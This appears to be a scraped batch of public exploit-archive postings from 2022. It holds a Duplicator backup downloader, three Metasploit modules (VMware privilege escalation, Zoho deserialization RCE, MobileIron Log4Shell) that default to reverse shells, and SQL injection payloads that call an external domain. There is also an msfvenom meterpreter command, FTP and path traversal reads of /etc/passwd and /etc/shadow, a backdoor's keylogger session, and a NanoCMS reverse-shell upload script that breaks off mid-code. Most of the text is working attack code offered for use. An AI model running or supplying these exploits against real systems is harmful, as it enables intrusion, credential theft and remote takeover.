<pre><code>## Title: WordPress Plugin Duplicator 1.4.7 - Unauthenticated Backup Download<br />## Author: nu11secur1ty<br />## Date: 08.03.2022<br />## Vendor: https://wordpress.org/<br />## Software: https://wordpress.org/plugins/duplicator/<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin<br /><br /><br /><br />## Description:<br />The WordPress Plugin Duplicator 1.4.7 suffers from Unauthenticated<br />Backup Download.<br />The attacker can download all archive information from the system by<br />using this vulnerability!<br />Status: CRITICAL<br /><br />[+] Exploit:<br /><br />```mysql<br />#!/usr/bin/python<br /># Author nu11secur1ty<br />import requests<br />import time<br /><br />vulnerableURL =<br />"http://pwned_host.com/wordpress/wp-content/backups-dup-lite/20220803_pwned_28dce10d86c575519304_20220803113819_archive.zip"<br />response = requests.get(vulnerableURL)<br />open("20220803_pwned_28dce10d86c575519304_20220803113819_archive.zip",<br />"wb").write(response.content)<br />time.sleep(5)<br />print("Right now, you just downloaded the secret archive =)\n")<br /><br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/n3osob)<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::EXE<br /> include Msf::Post::File<br /> include Msf::Post::Unix<br /><br /> TARGET_FILE = '/opt/vmware/certproxy/bin/cert-proxy.sh'.freeze<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> {<br /> 'Name' => 'VMware Workspace ONE Access CVE-2022-31660',<br /> 'Description' => %q{<br /> VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges<br /> to those of the root user by modifying a file and then restarting the vmware-certproxy service which<br /> invokes it. The service control is permitted via the sudo configuration without a password.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Spencer McIntyre'<br /> ],<br /> 'Platform' => [ 'linux', 'unix' ],<br /> 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],<br /> 'SessionTypes' => ['shell', 'meterpreter'],<br /> 'Targets' => [<br /> [ 'Automatic', {} ],<br /> ],<br /> 'DefaultOptions' => {<br /> 'PrependFork' => true,<br /> 'MeterpreterTryToFork' => true<br /> },<br /> 'Privileged' => true,<br /> 'DefaultTarget' => 0,<br /> 'References' => [<br /> [ 'CVE', '2022-31660' ],<br /> [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0021.html' ]<br /> ],<br /> 'DisclosureDate' => '2022-08-02',<br /> 'Notes' => {<br /> # We're corrupting the vmware-certproxy service, if restoring the contents fails it won't work. This service<br /> # is disabled by default though.<br /> 'Stability' => [CRASH_SERVICE_DOWN],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK]<br /> }<br /> }<br /> )<br /> )<br /> end<br /><br /> def certproxy_service<br /> # this script's location depends on the version, so find it.<br /> return @certproxy_service if @certproxy_service<br /><br /> @certproxy_service = [<br /> '/usr/local/horizon/scripts/certproxyService.sh',<br /> '/opt/vmware/certproxy/bin/certproxyService.sh'<br /> ].find { |path| file?(path) }<br /><br /> vprint_status("Found service control script at: #{@certproxy_service}") if @certproxy_service<br /> @certproxy_service<br /> end<br /><br /> def sudo(arguments)<br /> cmd_exec("sudo --non-interactive #{arguments}")<br /> end<br /><br /> def check<br /> unless whoami == 'horizon'<br /> return CheckCode::Safe('Not running as the horizon user.')<br /> end<br /><br /> token = Rex::Text.rand_text_alpha(10)<br /> unless sudo("--list '#{certproxy_service}' && echo #{token}").include?(token)<br /> return CheckCode::Safe('Cannot invoke the service control script with sudo.')<br /> end<br /><br /> unless writable?(TARGET_FILE)<br /> return CheckCode::Safe('Cannot write to the service file.')<br /> end<br /><br /> CheckCode::Appears<br /> end<br /><br /> def exploit<br /> # backup the original permissions and contents<br /> print_status('Backing up the original file...')<br /> @backup = {<br /> stat: stat(TARGET_FILE),<br /> contents: read_file(TARGET_FILE)<br /> }<br /><br /> if payload.arch.first == ARCH_CMD<br /> payload_data = "#!/bin/bash\n#{payload.encoded}"<br /> else<br /> payload_data = generate_payload_exe<br /> end<br /> upload_and_chmodx(TARGET_FILE, payload_data)<br /> print_status('Triggering the payload...')<br /> sudo("--background #{certproxy_service} restart")<br /> end<br /><br /> def cleanup<br /> return unless @backup<br /><br /> print_status('Restoring file contents...')<br /> file_rm(TARGET_FILE) # it's necessary to delete the running file before overwriting it<br /> write_file(TARGET_FILE, @backup[:contents])<br /> print_status('Restoring file permissions...')<br /> chmod(TARGET_FILE, @backup[:stat].mode & 0o777)<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /><br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::JavaDeserialization<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Zoho Password Manager Pro XML-RPC Java Deserialization',<br /> 'Description' => %q{<br /> This module exploits a Java deserialization vulnerability in Zoho ManageEngine Pro<br /> before 12101 and PAM360 before 5510. Unauthenticated attackers can send a<br /> crafted XML-RPC request containing malicious serialized data to /xmlrpc to<br /> gain RCE as the SYSTEM user.<br /> },<br /> 'Author' => [<br /> 'Vinicius', # Discovery<br /> 'Y4er', # Writeup<br /> 'Grant Willcox' # Exploit<br /> ],<br /> 'References' => [<br /> ['CVE', '2022-35405'],<br /> ['URL', 'https://xz.aliyun.com/t/11578'], # Writeup<br /> ['URL', 'https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html'], # Advisory<br /> ['URL', 'https://archives2.manageengine.com/passwordmanagerpro/12101/ManageEngine_PasswordManager_Pro_12100_to_12101.ppm'] # The patch.<br /> ],<br /> 'DisclosureDate' => '2022-06-24', # Vendor release date of patch and new installer, as advisory lacks any date.<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => ['win'],<br /> 'Arch' => [ARCH_CMD, ARCH_X64],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [<br /> 'Windows EXE Dropper',<br /> {<br /> 'Arch' => ARCH_X64,<br /> 'Type' => :windows_dropper,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' }<br /> }<br /> ],<br /> [<br /> 'Windows Command',<br /> {<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :windows_command,<br /> 'Space' => 3000,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/reverse_powershell' }<br /> }<br /> ],<br /> [<br /> 'Windows Powershell',<br /> {<br /> 'Arch' => ARCH_X64,<br /> 'Type' => :windows_powershell,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/x64/meterpreter/reverse_tcp' }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 1,<br /> 'DefaultOptions' => {<br /> 'SSL' => true<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> Opt::RPORT(7272),<br /> OptString.new('TARGETURI', [true, 'Base path', '/'])<br /> ])<br /> end<br /><br /> def check<br /> # Send an empty serialized object<br /> res = send_request_xmlrpc('')<br /><br /> unless res<br /> return CheckCode::Unknown('Target did not respond to check.')<br /> end<br /><br /> if res.body.include?('Failed to read result object: null')<br /> return CheckCode::Vulnerable('Target can deserialize arbitrary data.')<br /> end<br /><br /> CheckCode::Safe('Target cannot deserialize arbitrary data.')<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> case target['Type']<br /> when :windows_command<br /> execute_command(payload.encoded)<br /> when :windows_dropper<br /> cmd_target = targets.select { |target| target['Type'] == :windows_command }.first<br /> execute_cmdstager({ linemax: cmd_target.opts['Space'] })<br /> when :windows_powershell<br /> execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))<br /> end<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> vprint_status("Executing command: #{cmd}")<br /><br /> res = send_request_xmlrpc(<br /> generate_java_deserialization_for_command('CommonsBeanutils1', 'cmd', cmd)<br /> )<br /><br /> unless res && res.code == 200<br /> fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")<br /> end<br /><br /> print_good("Successfully executed command: #{cmd}")<br /> end<br /><br /> def send_request_xmlrpc(data)<br /> # http://xmlrpc.com/<br /> # https://ws.apache.org/xmlrpc/<br /> send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/xmlrpc'),<br /> 'ctype' => 'text/xml',<br /> 'data' => <<~XML<br /> <?xml version="1.0"?><br /> <methodCall><br /> <methodName>#{rand_text_alphanumeric(8..42)}</methodName><br /> <params><br /> <param><br /> <value><br /> <struct><br /> <member><br /> <name>#{rand_text_alphanumeric(8..42)}</name><br /> <value><br /> <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">#{Rex::Text.encode_base64(data)}</serializable><br /> </value><br /> </member><br /> </struct><br /> </value><br /> </param><br /> </params><br /> </methodCall><br /> XML<br /> )<br /> end<br /><br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::Log4Shell<br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(_info = {})<br /> super(<br /> 'Name' => 'MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)',<br /> 'Description' => %q{<br /> MobileIron Core is affected by the Log4Shell vulnerability whereby a JNDI string sent to the server<br /> will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS<br /> command execution in the context of the tomcat user.<br /><br /> This module will start an LDAP server that the target will need to connect to.<br /> },<br /> 'Author' => [<br /> 'Spencer McIntyre', # JNDI/LDAP lib stuff<br /> 'RageLtMan <rageltman[at]sempervictus>', # JNDI/LDAP lib stuff<br /> 'rwincey', # discovered log4shell vector in MobileIron<br /> 'jbaines-r7' # wrote this module<br /> ],<br /> 'References' => [<br /> [ 'CVE', '2021-44228' ],<br /> [ 'URL', 'https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis'],<br /> [ 'URL', 'https://forums.ivanti.com/s/article/Security-Bulletin-CVE-2021-44228-Remote-code-injection-in-Log4j?language=en_US' ],<br /> [ 'URL', 'https://www.mandiant.com/resources/mobileiron-log4shell-exploitation' ]<br /> ],<br /> 'DisclosureDate' => '2021-12-12',<br /> 'License' => MSF_LICENSE,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true,<br /> 'SRVPORT' => 389,<br /> 'WfsDelay' => 30<br /> },<br /> 'Targets' => [<br /> [<br /> 'Linux', {<br /> 'Platform' => 'unix',<br /> 'Arch' => [ARCH_CMD],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash'<br /> }<br /> },<br /> ]<br /> ],<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'SideEffects' => [IOC_IN_LOGS],<br /> 'AKA' => ['Log4Shell', 'LogJam'],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'RelatedModules' => [<br /> 'auxiliary/scanner/http/log4shell_scanner',<br /> 'exploit/multi/http/log4shell_header_injection'<br /> ]<br /> }<br /> )<br /> register_options([<br /> OptString.new('TARGETURI', [ true, 'Base path', '/'])<br /> ])<br /> end<br /><br /> def wait_until(&block)<br /> datastore['WfsDelay'].times do<br /> break if block.call<br /><br /> sleep(1)<br /> end<br /> end<br /><br /> def check<br /> validate_configuration!<br /><br /> vprint_status('Attempting to trigger the jndi callback...')<br /><br /> start_service<br /> res = trigger<br /> return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?<br /><br /> wait_until { @search_received }<br /> @search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown('No LDAP search query was received.')<br /> ensure<br /> cleanup_service<br /> end<br /><br /> def build_ldap_search_response_payload<br /> return [] if @search_received<br /><br /> @search_received = true<br /><br /> return [] unless @exploiting<br /><br /> print_good('Delivering the serialized Java object to execute the payload...')<br /> build_ldap_search_response_payload_inline('CommonsBeanutils1')<br /> end<br /><br /> def trigger<br /> @search_received = false<br /><br /> send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri, 'mifs', 'j_spring_security_check'),<br /> 'headers' => {<br /> 'Referer' => "https://#{rhost}#{normalize_uri(target_uri, 'mifs', 'user', 'login.jsp')}"<br /> },<br /> 'encode' => false,<br /> 'vars_post' => {<br /> 'j_username' => log4j_jndi_string,<br /> 'j_password' => Rex::Text.rand_text_alphanumeric(8),<br /> 'logincontext' => 'employee'<br /> }<br /> )<br /> end<br /><br /> def exploit<br /> validate_configuration!<br /> @exploiting = true<br /> start_service<br /> res = trigger<br /> fail_with(Failure::Unreachable, 'Failed to trigger the vulnerability') if res.nil?<br /> fail_with(Failure::UnexpectedReply, 'The server replied to the trigger in an unexpected way') unless res.code == 302<br /><br /> wait_until { @search_received && (!handler_enabled? || session_created?) }<br /> handler<br /> end<br />end<br /></code></pre>
<pre><code>## Title: Multi-Language-Hotel-Management-2022 1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 08.03.2022<br />## Vendor: https://www.nikhilbhalerao.com/<br />## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/Nikhil%20Bhalerao/2022/Multi-Language-Hotel-Management-2022/Docs/sparkz.zip<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Nikhil%20Bhalerao/2022/Multi-Language-Hotel-Management-2022<br /><br /><br />## Description:<br />The `email` parameter appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\kpdw69idt7zx6jw1ehdh1469o0utikd84bs3ft3i.tupunger.com\\ais'))+'<br />was submitted in the email parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The attacker can easily get the all database from this hotel system<br />and can do very malicious stuff with the users who are inside of this<br />system.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br />---<br />Parameter: email (POST)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: email=hmqHtDjH@burpcollaborator.net'+(select<br />load_file('\\\\kpdw69idt7zx6jw1ehdh1469o0utikd84bs3ft3i.tupunger.com\\ais'))+''||(SELECT<br />0x55644a42 WHERE 3972=3972 AND (SELECT 1380 FROM(SELECT<br />COUNT(*),CONCAT(0x7162787671,(SELECT<br />(ELT(1380=1380,1))),0x7178787671,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY<br />x)a))||'&password=m5S!k0l!S6&login=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: email=hmqHtDjH@burpcollaborator.net'+(select<br />load_file('\\\\kpdw69idt7zx6jw1ehdh1469o0utikd84bs3ft3i.tupunger.com\\ais'))+''||(SELECT<br />0x48536341 WHERE 9809=9809 AND (SELECT 5116 FROM<br />(SELECT(SLEEP(15)))ygbC))||'&password=m5S!k0l!S6&login=<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Nikhil%20Bhalerao/2022/Multi-Language-Hotel-Management-2022)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/uk7zq2)<br /><br /><br /></code></pre>
<pre><code>[+] Credits: Yehia Elghaly (aka Mrvar0x) <br />[+] Website: https://mrvar0x.com/<br />[+] Source: "https://mrvar0x.com/2022/08/02/multiple-endpoints-security-tampering-exploit/"<br /><br />Vendor:<br />=============<br />www.iobit.com<br /><br /><br />Product:<br />===========<br />IObit Malware Fighter 9.2 <br /><br />IObit Malware Fighter is an advanced malware & spyware removal utility that detects, removes the deepest infections, and protects the PC from various of potential malware, ransomware, cryptojacking, spyware, adware, trojans, keyloggers, bots, worms, and hijackers, etc. It includes the unique "Dual-Core" engine, driver-level technology and the heuristic malware detection.<br />Safebox can protect users from ransomware and allow users to lock their personal data with a password.<br /><br /><br />Vulnerability Type:<br />===================<br />Missing Tamper Protection<br />Incorrect Authorization<br /><br />CVE Reference:<br />==============<br />N/A<br /><br /><br />Security Issue:<br />================<br />IObit Malware Fighter prior to version 9.2 installed on Microsoft Windows does not provide sufficient anti-tampering protection of services by users with Administrator privileges. This could result in a user disabling IObit Malware Fighter and the protection offered by it. Also It lead to Raised privilege to SYSTEM.<br /><br />That can occurred by modifying a specific registry key.<br />Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AdvancedSystemCareService15<br />Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\IMFservice<br />Change ImagePath path to a malicious executable.<br /><br /><br />Exploit/POC:<br />=============<br />Create malicious executable through msfvenom<br /><br />msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -o meta.exe<br /><br />Modify (ImagePath) with the path of the malicious executable - Restart<br /><br /><br />Network Access:<br />===============<br />Local<br /><br /><br />Severity:<br />=========<br />High<br /><br /><br />[+] Disclaimer<br />The author is not responsible for any misuse of the information contained herein and accepts no responsibility<br />for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information<br />or exploits by the author or elsewhere. All content (c).<br /><br />Mrvar0x<br /></code></pre>
<pre><code># Exploit Title: uftpd 2.10 - Directory Traversal (Authenticated)<br /># Google Dork: N/A<br /># Exploit Author: Aaron Esau (arinerron)<br /># Vendor Homepage: https://github.com/troglobit/uftpd<br /># Software Link: https://github.com/troglobit/uftpd<br /># Version: 2.7 to 2.10<br /># Tested on: Linux<br /># CVE : CVE-2020-20277<br /># Reference: https://nvd.nist.gov/vuln/detail/CVE-2020-20277<br /># Reference: https://arinerron.com/blog/posts/6<br />#Product: uftpd 2.7 to 2.10<br /><br />#Proof-Of-Concept:<br />1-Arbitrary files could be read using directory traversal if the application is not running as root after authenticating. If the server has anonymous login enabled, it will be possible to read arbitrary files even without authentication. <br /><br />#Steps<br />1-Setup nc listener on attacking machine on TCP port 1258<br />nc -lnvp 1258<br /><br />2-Login to the FTP service<br /><br />3-List files <br />ftp> ls ../../../<br /><br />3-Set attacker's IP address and retrieve files<br />PORT 127,0,0,1,1,1002<br />RETR ../../../etc/passwd<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/c790749f851d48e66e7d59cc2e451956_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Destrukor.20<br />Vulnerability: Unauthenticated Remote Command Execution<br />Description: The malware listens on TCP port 6969. Third-party adversaries who can reach infected hosts can run commands made available by the backdoor. Remote attackers can read anything the victim types by starting the remote key log command "key_on". Some commands in Polish include "podglad", "dyski", "procesy", "wywiad", "rej_klucze1", "offserver" and many others.<br />Family: Destrukor<br />Type: PE32<br />MD5: c790749f851d48e66e7d59cc2e451956<br />Vuln ID: MVID-2022-0627<br />Dropped files: sys32.exe<br />Disclosure: 07/30/2022<br /><br /><br />Exploit/PoC:<br />C:\>nc64.exe x.x.x.x 6969<br />podglad<br />podglad_ok140922<br /><br />dyski<br />C:\ - Dysk lokalny<br />D:\ - CD-ROM<br /><br />procesy<br />procesy<br />C:\Windows\System32\sihost.exe<br />C:\Windows\System32\svchost.exe<br />C:\Windows\System32\taskhostw.exe<br />C:\Windows\System32\ctfmon.exe<br />C:\Windows\explorer.exe<br />C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe<br />C:\Windows\System32\RuntimeBroker.exe<br />C:\Windows\System32\RuntimeBroker.exe<br />C:\Program Files\Process Hacker 2\ProcessHacker.exe<br />C:\Windows\System32\vm3dservice.exe<br />C:\Program Files\VMware\VMware Tools\vmtoolsd.exe<br />C:\Windows\System32\cmd.exe<br />C:\Windows\System32\conhost.exe<br />C:\Windows\System32\cmd.exe<br />C:\Windows\System32\conhost.exe<br />C:\Windows\System32\taskhostw.exe<br />C:\Windows\System32\RuntimeBroker.exe<br />C:\Windows\System32\dllhost.exe<br />C:\Windows\System32\cmd.exe<br />C:\Windows\System32\conhost.exe<br />C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe<br />C:\Windows\sys32.exe<br /><br />wywiad\r\n<br />wywiad<br />Windows 10 Enterprise<br />gg<br />DESKTOP-2C3IQHO<br />192.168.18.125<br />2852<br />12778<br />C:\WINDOWS<br />2.0.0<br /><br />rej_klucze1<br />AppEvents<br />AppXBackupContentType<br />Console<br />Control Panel<br />Environment<br />EUDC<br />Keyboard Layout<br />Network<br />Printers<br />Software<br />System<br />Volatile Environment<br /><br />key_on<br />@N@O@T@E@P@A@D@[Enter]<br />@[L Ctrl]@A@[<-BckSpc]@[L Shift]@I@ @[L Shift]@D@O@N@T@ @L@I@K@E@ @Y@O@U@1 ===> "I DONT LIKE YOU"<br /><br />offserver<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Omnia MPX 1.5.0+r1 - Path Traversal<br /># Date: 24/7/2022<br /># Exploit Author: Momen Eldawakhly (Cyber Guy)<br /># Vendor Homepage: https://www.telosalliance.com/<br /># Software Link: https://support.telosalliance.com/article/934ixoaz3l-mpx-node-release-notes-and-update-instructions<br /># Version: 1.5.0+r1<br /># Tested on: MacOS<br /># PoC:<br />http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..//etc/passwd<br />http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..//etc/shadow<br /><br />User Database:<br />http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json<br /><br /></code></pre>
<pre><code># Exploit Title: NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 2022-07-26<br /># Exploit Auuthor: p1ckzi<br /># Vendor Homepage: https://github.com/kalyan02/NanoCMS<br /># Version: NanoCMS v0.4<br /># Tested on: Linux Mint 20.3<br /># CVE: N/A<br />#<br /># Description:<br /># this script uploads a php reverse shell to the target.<br /># NanoCMS does not sanitise the data of an authenticated user while creating<br /># webpages. pages are saved with .php extensions by default, allowing an<br /># authenticated attacker access to the underlying system:<br /># https://github.com/ishell/Exploits-Archives/blob/master/2009-exploits/0904-exploits/nanocms-multi.txt<br /><br />#!/usr/bin/env python3<br /><br />import argparse<br />import bs4<br />import errno<br />import re<br />import requests<br />import secrets<br />import sys<br /><br /><br />def arguments():<br /> parser = argparse.ArgumentParser(<br /> formatter_class=argparse.RawDescriptionHelpFormatter,<br /> description=f"{sys.argv[0]} exploits authenticated file upload"<br /> "\nand remote code execution in NanoCMS v0.4",<br /> epilog=f"examples:"<br /> f"\n\tpython3 {sys.argv[0]} http://10.10.10.10/ rev.php"<br /> f"\n\tpython3 {sys.argv[0]} http://hostname:8080 rev-shell.php -a"<br /> f"\n\t./{sys.argv[0]} https://10.10.10.10 rev-shell -n -e -u 'user'"<br /> )<br /> parser.add_argument(<br /> "address", help="schema/ip/hostname, port, sub-directories"<br /> " to the vulnerable NanoCMS server"<br /> )<br /> parser.add_argument(<br /> "file", help="php file to upload"<br /> )<br /> parser.add_argument(<br /> "-u", "--user", help="username", default="admin"<br /> )<br /> parser.add_argument(<br /> "-p", "--passwd", help="password", default="demo"<br /> )<br /> parser.add_argument(<br /> "-e", "--execute", help="attempts to make a request to the uploaded"<br /> " file (more useful if uploading a reverse shell)",<br /> action="store_true", default=False<br /> )<br /> parser.add_argument(<br /> "-a", "--accessible", help="turns off features"<br /> " which may negatively affect screen readers",<br /> action="store_true", default=False<br /> )<br /> parser.add_argument(<br /> "-n", "--no-colour", help="removes colour output",<br /> action="store_true", default=False<br /> )<br /> arguments.option = parser.parse_args()<br /><br /><br /># settings for terminal output defined by user in term_settings().<br />class settings():<br /> # colours.<br /> c0 = ""<br /> c1 = ""<br /> c2 = ""<br /><br /> # information boxes.<br /> i1 = ""<br /> i2 = ""<br /> i3 = ""<br /> i4 = ""<br /><br /><br /># checks for terminal setting flags supplied by arguments().<br />def term_settings():<br /> if arguments.option.accessible:<br /> small_banner()<br /> elif arguments.option.no_colour:<br /> settings.i1 = "[+] "<br /> settings.i2 = "[!] "<br /> settings.i3 = "[i] "<br /> settings.i4 = "$ "<br /> banner()<br /> elif not arguments.option.accessible or arguments.option.no_colour:<br /> settings.c0 = "\u001b[0m" # reset.<br /> settings.c1 = "\u001b[38;5;1m" # red.<br /> settings.c2 = "\u001b[38;5;2m" # green.<br /> settings.i1 = "[+] "<br /> settings.i2 = "[!] "<br /> settings.i3 = "[i] "<br /> settings.i4 = "$ "<br /> banner()<br /> else:<br /> print("something went horribly wrong!")<br /> sys.exit()<br /><br /><br /># default terminal banner (looks prettier when run lol)<br />def banner():<br /> print(<br /> "\n .__ .__"<br /> " .__ "<br /> "\n ____ _____ ____ ____ ____ _____ _____| |__ ____ | "<br /> "| | | "<br /> "\n / \\__ \\ / \\ / _ \\_/ ___\\ / \\ / ___/ | \\_/ "<br /> "__ \\| | | | "<br /> "\n| | \\/ __ \\| | ( <_> ) \\___| Y Y \\___ \\| Y \\ _"<br /> "__/| |_| |__"<br /> "\n|___| (____ /___| /\\____/ \\___ >__|_| /____ >___| /\\___ "<br /> ">____/____/"<br /> "\n \\/ \\/ \\/ \\/ \\/ \\/ \\/ "<br /> " \\/"<br /> )<br /><br /><br />def small_banner():<br /> print(<br /> f"{sys.argv[0]}"<br /> "\nNanoCMS authenticated file upload and rce..."<br /> )<br /><br /><br /># appends a '/' if not supplied at the end of the address.<br />def address_check(address):<br /> check = re.search('/$', address)<br /> if check is not None:<br /> print('')<br /> else:<br /> arguments.option.address += "/"<br /><br /><br /># creates a new filename for each upload.<br /># errors occur if the filename is the same as a previously uploaded one.<br />def random_filename():<br /> random_filename.name = secrets.token_hex(4)<br /><br /><br /># note: after a successful login, credentials are saved, so further reuse<br /># of the script will most likely not require correct credentials.<br />def login(address, user, passwd):<br /> post_header = {<br /> "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) "<br /> "Gecko/20100101 Firefox/91.0",<br /> "Accept": "text/html,application/xhtml+xml,"<br /> "application/xml;q=0.9,image/webp,*/*;q=0.8",<br /> "Accept-Language": "en-US,en;q=0.5",<br /> "Accept-Encoding": "gzip, deflate",<br /> "Content-Type": "application/x-www-form-urlencoded",<br /> "Content-Length": "",<br /> "Connection": "close",<br /> "Referer": f"{arguments.option.address}data/nanoadmin.php",<br /> "Cookie": "PHPSESSID=46ppbqohiobpvvu6olm51ejlq5",<br /> "Upgrade-Insecure-Requests": "1",<br /> }<br /> post_data = {<br /> "user": f"{user}",<br /> "pass": f"{passwd}"<br /> }<br /><br /> url_request = requests.post(<br /> address + 'data/nanoadmin.php?',<br /> headers=post_header,<br /> data=post_data,<br /> verify=False,<br /> timeout=30<br /> )<br /> signin_error = url_request.text<br /> if 'Error : wrong Username or Password' in signin_error:<br /> print(<br /> f"{settings.c1}{settings.i2}could "<br /> f"sign in with {arguments.option.user}/"<br /> f"{arguments.option.passwd}.{settings.c0}"<br /> )<br /> sys.exit(1)<br /> else:<br /> print(<br /> f"{settings.c2}{settings.i1}logged in successfully."<br /> f"{settings.c0}"<br /> )<br /><br /><br />def exploit(address, file, name):<br /> with open(arguments.option.file, 'r') as file:<br /> file_contents = file.read().rstrip()<br /> post_header = {<br /> "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) "<br /> "Gecko/20100101 Firefox/91.0",<br /> "Accept": "text/html,application/xhtml+xml,"<br /> "application/xml;q=0.9,image/webp,*/*;q=0.8",<br /> "Accept-Language": "en-US,en;q=0.5",<br /> "Accept-Encoding": "gzip, deflate",<br /> "Content-Type": "application/x-www-form-urlencoded",<br /> "Content-Length": "",<br /> "Connection": "close",<br /> "Referer": f"{arguments.option.address}data/nanoadmin.php?action="<br /> "addpage",<br /> "Cookie": "PHPSESSID=46ppbqohiobpvvu6olm51ejlq5",<br /> 